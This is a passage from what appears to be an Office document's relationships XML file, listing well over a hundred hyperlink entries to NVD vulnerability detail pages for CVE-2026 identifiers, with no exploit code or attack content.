Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78441" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78502" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78503" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78515" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78520" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78522" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78838" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79379" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79573" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80073" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80076" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80078" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80079" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80082" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80084" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80086" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80087" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80088" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80089" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80090" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80091" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81377" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81792" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81802" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84282" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84685" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86077" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86078" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86079" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86082" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86550" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86597" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86726" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86731" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12230" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33388" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70582" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72947" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76931" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53639" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81904" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81994" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81997" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84942" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18090" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19872" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63523" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69642" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76002" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77654" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78738" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78741" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78742" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85484" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85485" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85630" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56101" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78216" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78230" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16004" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69382" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72978" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75809" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16005" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69559" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75811" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16006" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18023" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69317" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69393" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75808" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75810" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28584" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28596" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28617" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28633" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54611" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68843" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68852" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68881" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68895" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69303" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69308" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69321" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69339" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69345" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69353" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69367" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69376" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69403" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69453" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69531" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69554" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69568" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69618" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69672" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69674" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69684" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69741" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69770" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69794" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72937" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72945" 